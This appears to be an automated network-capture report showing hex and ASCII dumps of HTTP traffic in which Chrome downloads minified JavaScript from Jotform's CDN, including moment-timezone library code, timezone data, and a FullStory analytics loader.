                                                                                                                                                                                                                                            2025-01-10 12:35:57 UTC1369INData Raw: 6e 3d 74 68 69 73 2e 63 61 63 68 65 2e 67 65 74 28 74 29 3b 72 65 74 75 72 6e 28 21 6e 26 26 72 26 26 28 6e 3d 61 77 61 69 74 20 63 28 28 29 3d 3e 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 65 2c 72 29 3d 3e 7b 6c 65 74 20 6e 3d 74 68 69 73 2e 63 61 63 68 65 2e 67 65 74 28 74 29 3b 6e 26 26 28 74 68 69 73 2e 69 73 56 61 6c 75 65 56 61 6c 69 64 28 6e 29 3f 65 28 6e 29 3a 28 74 68 69 73 2e 63 61 63 68 65 2e 64 65 6c 65 74 65 28 74 29 2c 65 28 76 6f 69 64 20 30 29 29 29 2c 72 28 29 7d 29 2c 34 30 2c 35 30 29 29 2c 6e 26 26 74 68 69 73 2e 69 73 56 61 6c 75 65 56 61 6c 69 64 28 6e 29 29 3f 6e 2e 72 65 73 70 6f 6e 73 65 3a 28 74 68 69 73 2e 63 61 63 68 65 2e 64 65 6c 65 74 65 28 74 29 2c 6e 75 6c 6c 29 7d 72 65 6d 6f 76 65 28 65 29 7b 74 68 69 73 2e 63 61 63 68 65
                                                                                                                                                                                                                                            Data Ascii: n=this.cache.get(t);return(!n&&r&&(n=await c(()=>new Promise((e,r)=>{let n=this.cache.get(t);n&&(this.isValueValid(n)?e(n):(this.cache.delete(t),e(void 0))),r()}),40,50)),n&&this.isValueValid(n))?n.response:(this.cache.delete(t),null)}remove(e){this.cache
                                                                                                                                                                                                                                            2025-01-10 12:35:57 UTC1369INData Raw: 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6e 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6e 7d 29 7d 72 65 74 75 72 6e 20 65 7d 29 28 7b 7d 2c 74 2c 65 29 3b 63 6c 61 73 73 20 79 7b 72 75 6e 28 65 29 7b 74 68 69 73 2e 69 6e 74 65 72 63 65 70 74 6f 72 73 2e 66 6f 72 45 61 63 68 28 74 3d 3e 7b 74 28 65 29 7d 29 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 76 61 72 20 74 2c 72 3b 72 3d 76 6f 69 64 20 30 2c 28 74 3d 22 69 6e 74 65 72 63 65 70 74 6f 72 73 22 29 69 6e 20 74 68 69 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 68 69 73 2c 74 2c 7b 76 61 6c 75 65 3a 72 2c 65 6e 75 6d 65 72 61 62 6c
                                                                                                                                                                                                                                            Data Ascii: fineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n})}return e})({},t,e);class y{run(e){this.interceptors.forEach(t=>{t(e)})}constructor(e){var t,r;r=void 0,(t="interceptors")in this?Object.defineProperty(this,t,{value:r,enumerabl


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            22192.168.2.1749726172.67.7.1074435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:57 UTC410OUTGET /s/vendor/static/moment-timezone/0.5.43/moment-timezone-with-data.min.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn02.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:35:57 UTC428INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:57 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 780925
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 12:48:19 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            Age: 89
                                                                                                                                                                                                                                            last-modified: Thu, 26 Dec 2024 11:09:36 GMT
                                                                                                                                                                                                                                            etag: "a6604abaadcf1a25a434a312ae70e0ed"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5be6b2e5e74-EWR
                                                                                                                                                                                                                                            2025-01-10 12:35:57 UTC941INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 4d 2c 7a 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 7a 28 72 65 71 75 69 72 65 28 22 6d 6f 6d 65 6e 74 22 29 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6d 6f 6d 65 6e 74 22 5d 2c 7a 29 3a 7a 28 4d 2e 6d 6f 6d 65 6e 74 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 4f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 6f 69 64 20 30 3d 3d 3d 4f 2e 76 65 72 73 69 6f 6e 26 26 4f 2e 64 65 66 61 75 6c 74 26 26 28 4f 3d 4f 2e 64 65 66 61 75 6c 74 29 3b 76 61 72 20
                                                                                                                                                                                                                                            Data Ascii: !function(M,z){"use strict";"object"==typeof module&&module.exports?module.exports=z(require("moment")):"function"==typeof define&&define.amd?define(["moment"],z):z(M.moment)}(this,function(O){"use strict";void 0===O.version&&O.default&&(O=O.default);var
                                                                                                                                                                                                                                            2025-01-10 12:35:57 UTC1369INData Raw: 2c 41 3d 62 2e 6c 65 6e 67 74 68 2c 63 3d 30 3b 63 3c 41 3b 63 2b 2b 29 4f 5b 63 5d 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 28 4f 5b 63 2d 31 5d 7c 7c 30 29 2b 36 65 34 2a 4f 5b 63 5d 29 3b 72 65 74 75 72 6e 20 4f 5b 41 2d 31 5d 3d 31 2f 30 2c 7b 6e 61 6d 65 3a 4d 5b 30 5d 2c 61 62 62 72 73 3a 4c 28 4d 5b 31 5d 2e 73 70 6c 69 74 28 22 20 22 29 2c 62 29 2c 6f 66 66 73 65 74 73 3a 4c 28 7a 2c 62 29 2c 75 6e 74 69 6c 73 3a 70 2c 70 6f 70 75 6c 61 74 69 6f 6e 3a 30 7c 4d 5b 35 5d 7d 7d 66 75 6e 63 74 69 6f 6e 20 66 28 4d 29 7b 4d 26 26 74 68 69 73 2e 5f 73 65 74 28 6e 28 4d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 42 28 4d 2c 7a 29 7b 74 68 69 73 2e 6e 61 6d 65 3d 4d 2c 74 68 69 73 2e 7a 6f 6e 65 73 3d 7a 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 4d 29 7b 76 61 72 20 7a 3d
                                                                                                                                                                                                                                            Data Ascii: ,A=b.length,c=0;c<A;c++)O[c]=Math.round((O[c-1]||0)+6e4*O[c]);return O[A-1]=1/0,{name:M[0],abbrs:L(M[1].split(" "),b),offsets:L(z,b),untils:p,population:0|M[5]}}function f(M){M&&this._set(n(M))}function B(M,z){this.name=M,this.zones=z}function N(M){var z=
                                                                                                                                                                                                                                            2025-01-10 12:35:57 UTC1369INData Raw: 68 61 74 20 64 61 74 61 20 6c 6f 61 64 65 64 2e 22 29 7d 7d 63 61 74 63 68 28 4d 29 7b 7d 66 6f 72 28 76 61 72 20 62 2c 70 2c 4f 3d 69 28 29 2c 41 3d 4f 2e 6c 65 6e 67 74 68 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 4d 29 7b 66 6f 72 28 76 61 72 20 7a 2c 62 2c 70 3d 4d 2e 6c 65 6e 67 74 68 2c 4f 3d 7b 7d 2c 41 3d 5b 5d 2c 63 3d 30 3b 63 3c 70 3b 63 2b 2b 29 66 6f 72 28 7a 20 69 6e 20 62 3d 52 5b 4d 5b 63 5d 2e 6f 66 66 73 65 74 5d 7c 7c 7b 7d 29 62 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 7a 29 26 26 28 4f 5b 7a 5d 3d 21 30 29 3b 66 6f 72 28 63 20 69 6e 20 4f 29 4f 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 63 29 26 26 41 2e 70 75 73 68 28 64 5b 63 5d 29 3b 72 65 74 75 72 6e 20 41 7d 28 4f 29 2c 71 3d 5b 5d 2c 6f 3d 30 3b 6f 3c 63 2e 6c 65 6e 67 74
                                                                                                                                                                                                                                            Data Ascii: hat data loaded.")}}catch(M){}for(var b,p,O=i(),A=O.length,c=function(M){for(var z,b,p=M.length,O={},A=[],c=0;c<p;c++)for(z in b=R[M[c].offset]||{})b.hasOwnProperty(z)&&(O[z]=!0);for(c in O)O.hasOwnProperty(c)&&A.push(d[c]);return A}(O),q=[],o=0;o<c.lengt
                                                                                                                                                                                                                                            2025-01-10 12:35:57 UTC1369INData Raw: 22 78 22 3d 3d 3d 4d 2e 5f 66 3b 72 65 74 75 72 6e 21 28 21 4d 2e 5f 61 7c 7c 76 6f 69 64 20 30 21 3d 3d 4d 2e 5f 74 7a 6d 7c 7c 7a 29 7d 66 75 6e 63 74 69 6f 6e 20 43 28 4d 29 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 63 6f 6e 73 6f 6c 65 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 26 26 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 4d 29 7d 66 75 6e 63 74 69 6f 6e 20 53 28 4d 29 7b 76 61 72 20 7a 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 30 2c 2d 31 29 2c 62 3d 61 72 67 75 6d 65 6e 74 73 5b 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2d 31 5d 2c 70 3d 74 28 62 29 2c 7a 3d 4f 2e 75 74 63 2e 61 70 70 6c 79
                                                                                                                                                                                                                                            Data Ascii: "x"===M._f;return!(!M._a||void 0!==M._tzm||z)}function C(M){"undefined"!=typeof console&&"function"==typeof console.error&&console.error(M)}function S(M){var z=Array.prototype.slice.call(arguments,0,-1),b=arguments[arguments.length-1],p=t(b),z=O.utc.apply
                                                                                                                                                                                                                                            2025-01-10 12:35:57 UTC1369INData Raw: 28 4d 2e 61 74 29 2e 72 65 70 6c 61 63 65 28 2f 5b 5e 41 2d 5a 5d 2f 67 2c 22 22 29 21 3d 3d 4d 2e 61 62 62 72 26 26 74 68 69 73 2e 61 62 62 72 53 63 6f 72 65 2b 2b 7d 2c 53 2e 76 65 72 73 69 6f 6e 3d 22 30 2e 35 2e 34 33 22 2c 53 2e 64 61 74 61 56 65 72 73 69 6f 6e 3d 22 22 2c 53 2e 5f 7a 6f 6e 65 73 3d 57 2c 53 2e 5f 6c 69 6e 6b 73 3d 41 2c 53 2e 5f 6e 61 6d 65 73 3d 64 2c 53 2e 5f 63 6f 75 6e 74 72 69 65 73 3d 63 2c 53 2e 61 64 64 3d 54 2c 53 2e 6c 69 6e 6b 3d 6c 2c 53 2e 6c 6f 61 64 3d 73 2c 53 2e 7a 6f 6e 65 3d 74 2c 53 2e 7a 6f 6e 65 45 78 69 73 74 73 3d 6d 2c 53 2e 67 75 65 73 73 3d 66 75 6e 63 74 69 6f 6e 28 4d 29 7b 72 65 74 75 72 6e 20 7a 3d 7a 26 26 21 4d 3f 7a 3a 65 28 29 7d 2c 53 2e 6e 61 6d 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72
                                                                                                                                                                                                                                            Data Ascii: (M.at).replace(/[^A-Z]/g,"")!==M.abbr&&this.abbrScore++},S.version="0.5.43",S.dataVersion="",S._zones=W,S._links=A,S._names=d,S._countries=c,S.add=T,S.link=l,S.load=s,S.zone=t,S.zoneExists=m,S.guess=function(M){return z=z&&!M?z:e()},S.names=function(){var
                                                                                                                                                                                                                                            2025-01-10 12:35:57 UTC1369INData Raw: 2f 6d 6f 6d 65 6e 74 6a 73 2e 63 6f 6d 2f 74 69 6d 65 7a 6f 6e 65 2f 64 6f 63 73 2f 23 2f 64 61 74 61 2d 6c 6f 61 64 69 6e 67 2f 2e 22 29 2c 74 68 69 73 7d 69 66 28 74 68 69 73 2e 5f 7a 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 7a 2e 6e 61 6d 65 7d 2c 4d 2e 7a 6f 6e 65 4e 61 6d 65 3d 50 28 4d 2e 7a 6f 6e 65 4e 61 6d 65 29 2c 4d 2e 7a 6f 6e 65 41 62 62 72 3d 50 28 4d 2e 7a 6f 6e 65 41 62 62 72 29 2c 4d 2e 75 74 63 3d 44 28 4d 2e 75 74 63 29 2c 4d 2e 6c 6f 63 61 6c 3d 44 28 4d 2e 6c 6f 63 61 6c 29 2c 4d 2e 75 74 63 4f 66 66 73 65 74 3d 28 67 3d 4d 2e 75 74 63 4f 66 66 73 65 74 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 30 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 28 74 68 69 73 2e 5f 7a 3d 6e 75 6c 6c 29 2c 67 2e 61 70 70 6c 79
                                                                                                                                                                                                                                            Data Ascii: /momentjs.com/timezone/docs/#/data-loading/."),this}if(this._z)return this._z.name},M.zoneName=P(M.zoneName),M.zoneAbbr=P(M.zoneAbbr),M.utc=D(M.utc),M.local=D(M.local),M.utcOffset=(g=M.utcOffset,function(){return 0<arguments.length&&(this._z=null),g.apply
                                                                                                                                                                                                                                            2025-01-10 12:35:57 UTC1369INData Raw: 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32
                                                                                                                                                                                                                                            Data Ascii: 212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212
                                                                                                                                                                                                                                            2025-01-10 12:35:57 UTC1369INData Raw: 31 64 30 20 31 71 4c 30 20 58 64 30 20 31 6f 4c 30 20 31 31 64 30 20 31 6f 4c 30 20 31 31 64 30 20 31 70 62 30 20 31 31 64 30 20 31 6f 4c 30 20 31 31 64 30 20 31 6f 4c 30 20 31 31 64 30 20 31 6e 79 30 20 31 31 7a 30 20 31 6f 31 30 20 31 31 7a 30 20 31 6f 31 30 20 31 31 7a 30 20 31 6f 31 30 20 31 31 7a 30 20 31 71 4e 30 20 31 31 7a 30 20 31 6f 31 30 20 31 31 7a 30 20 31 6f 31 30 20 31 31 7a 30 20 31 6f 31 30 20 31 31 7a 30 20 31 6f 31 30 20 31 31 7a 30 20 31 71 4e 30 20 31 31 7a 30 20 31 6f 31 30 20 31 31 7a 30 20 31 6f 31 30 20 57 4c 30 20 31 71 4e 30 20 52 62 30 20 31 77 70 30 20 4f 6e 30 20 31 7a 64 30 20 4c 7a 30 20 31 45 4e 30 20 46 62 30 20 63 31 30 20 38 6e 30 20 38 4e 64 30 20 67 4c 30 20 65 31 30 20 6d 6e 30 20 6b 53 70 30 20 31 63 4c 30 20 31 63
                                                                                                                                                                                                                                            Data Ascii: 1d0 1qL0 Xd0 1oL0 11d0 1oL0 11d0 1pb0 11d0 1oL0 11d0 1oL0 11d0 1ny0 11z0 1o10 11z0 1o10 11z0 1o10 11z0 1qN0 11z0 1o10 11z0 1o10 11z0 1o10 11z0 1o10 11z0 1qN0 11z0 1o10 11z0 1o10 WL0 1qN0 Rb0 1wp0 On0 1zd0 Lz0 1EN0 Fb0 c10 8n0 8Nd0 gL0 e10 mn0 kSp0 1cL0 1c
                                                                                                                                                                                                                                            2025-01-10 12:35:57 UTC1369INData Raw: 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 66 7a 30 20 31 61 31 30 20 31 66 7a 30 20 31 61 31 30 20 31 66 7a 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 66 7a 30 20 31 61 31 30 20 31 66 7a 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 66 7a 30 20 31 61 31 30 20 31 66 7a 30 20 31 61 31 30 20 31 66 7a 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 66 7a 30 20 31 61 31 30 20 31 66 7a 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 66 7a 30 20 31
                                                                                                                                                                                                                                            Data Ascii: cL0 1cN0 1cL0 1cN0 1fz0 1a10 1fz0 1a10 1fz0 1cN0 1cL0 1cN0 1cL0 1cN0 1cL0 1cN0 1fz0 1a10 1fz0 1cN0 1cL0 1cN0 1cL0 1cN0 1cL0 1cN0 1fz0 1a10 1fz0 1a10 1fz0 1cN0 1cL0 1cN0 1cL0 1cN0 1cL0 1cN0 1fz0 1a10 1fz0 1cN0 1cL0 1cN0 1cL0 1cN0 1cL0 1cN0 1cL0 1cN0 1fz0 1
                                                                                                                                                                                                                                            2025-01-10 12:35:57 UTC1369INData Raw: 31 66 7a 30 20 31 61 31 30 20 31 66 7a 30 20 31 61 31 30 20 31 66 7a 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 66 7a 30 20 31 61 31 30 20 31 66 7a 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 66 7a 30 20 31 61 31 30 20 31 66 7a 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 66 7a 30 20 31 61 31 30 20 31 66 7a 30 20 31 61 31 30 20 31 66 7a 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 31 66 7a 30 20 31 61 31 30 20 31 66 7a 30 20 31 63 4e 30 20 31 63 4c 30 20
                                                                                                                                                                                                                                            Data Ascii: 1fz0 1a10 1fz0 1a10 1fz0 1cN0 1cL0 1cN0 1cL0 1cN0 1cL0 1cN0 1fz0 1a10 1fz0 1cN0 1cL0 1cN0 1cL0 1cN0 1cL0 1cN0 1cL0 1cN0 1fz0 1a10 1fz0 1cN0 1cL0 1cN0 1cL0 1cN0 1cL0 1cN0 1fz0 1a10 1fz0 1a10 1fz0 1cN0 1cL0 1cN0 1cL0 1cN0 1cL0 1cN0 1fz0 1a10 1fz0 1cN0 1cL0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            23192.168.2.1749727104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:58 UTC386OUTGET /s/portal/674ac14411e/static/js/8953.7f4b13b0.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn01.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:35:58 UTC430INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:58 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 1618634
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:21:16 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "e12c5f031d037522abc840e972f9a822"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 261
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5c2588d0f3d-EWR
                                                                                                                                                                                                                                            2025-01-10 12:35:58 UTC939INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 38 39 35 33 2e 37 66 34 62 31 33 62 30 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 65 2e 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64
                                                                                                                                                                                                                                            Data Ascii: /*! For license information please see 8953.7f4b13b0.js.LICENSE.txt */!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugId
                                                                                                                                                                                                                                            2025-01-10 12:35:58 UTC1369INData Raw: 72 61 79 28 65 29 2c 6e 3d 30 3b 6e 3c 65 3b 6e 2b 2b 29 74 5b 6e 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3b 72 65 74 75 72 6e 20 74 2e 65 76 65 72 79 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 69 28 29 5b 65 5d 7d 29 29 7d 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 77 69 6e 64 6f 77 2e 5f 66 73 5f 64 65 76 5f 6d 6f 64 65 29 7b 76 61 72 20 74 3d 22 46 75 6c 6c 53 74 6f 72 79 20 69 73 20 69 6e 20 64 65 76 20 6d 6f 64 65 20 61 6e 64 20 69 73 20 6e 6f 74 20 72 65 63 6f 72 64 69 6e 67 3a 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 6d 65 74 68 6f 64 20 6e 6f 74 20 65 78 65 63 75 74 65 64 22 29 3b 72 65 74 75 72 6e 20 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 74 29 2c 74 7d 76 61
                                                                                                                                                                                                                                            Data Ascii: ray(e),n=0;n<e;n++)t[n]=arguments[n];return t.every((function(e){return i()[e]}))},s=function(e){return function(){if(window._fs_dev_mode){var t="FullStory is in dev mode and is not recording: ".concat(e," method not executed");return console.warn(t),t}va
                                                                                                                                                                                                                                            2025-01-10 12:35:58 UTC1369INData Raw: 79 6d 6f 75 73 22 2c 69 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 22 2b 5f 66 73 5f 73 63 72 69 70 74 2c 28 73 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 72 29 5b 30 5d 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 69 2c 73 29 2c 61 2e 69 64 65 6e 74 69 66 79 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 61 28 6f 2c 7b 75 69 64 3a 65 7d 2c 6e 29 2c 74 26 26 61 28 6f 2c 74 2c 6e 29 7d 2c 61 2e 73 65 74 55 73 65 72 56 61 72 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 61 28 6f 2c 65 2c 74 29 7d 2c 61 2e 65 76 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 61 28 22 65 76 65 6e 74 22 2c 7b 6e 3a 65 2c 70 3a 74 7d 2c 6e 29 7d 2c 61 2e 61 6e 6f 6e 79 6d 69 7a 65 3d 66 75 6e 63 74
                                                                                                                                                                                                                                            Data Ascii: ymous",i.src="https://"+_fs_script,(s=t.getElementsByTagName(r)[0]).parentNode.insertBefore(i,s),a.identify=function(e,t,n){a(o,{uid:e},n),t&&a(o,t,n)},a.setUserVars=function(e,t){a(o,e,t)},a.event=function(e,t,n){a("event",{n:e,p:t},n)},a.anonymize=funct
                                                                                                                                                                                                                                            2025-01-10 12:35:58 UTC1369INData Raw: 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 6e 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 6e 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 72 29 26 26 28 65 5b 72 5d 3d 6e 5b 72 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 69 3d 6e 28 33 37 38 39 37 29 2c 61 3d 28 72 3d 69 29 26 26 72 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 72 3a 7b 64 65 66 61 75 6c 74 3a 72 7d 3b 74 2e 64 65 66 61 75 6c 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 66 69 6c 6c 2c 6e 3d 76 6f 69 64 20 30 3d 3d 3d 74 3f 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 3a 74 2c 72 3d 65 2e 77 69 64 74 68 2c 69 3d 76 6f 69 64 20 30 3d 3d 3d 72 3f
                                                                                                                                                                                                                                            Data Ascii: rguments.length;t++){var n=arguments[t];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(e[r]=n[r])}return e},i=n(37897),a=(r=i)&&r.__esModule?r:{default:r};t.default=function(e){var t=e.fill,n=void 0===t?"currentColor":t,r=e.width,i=void 0===r?
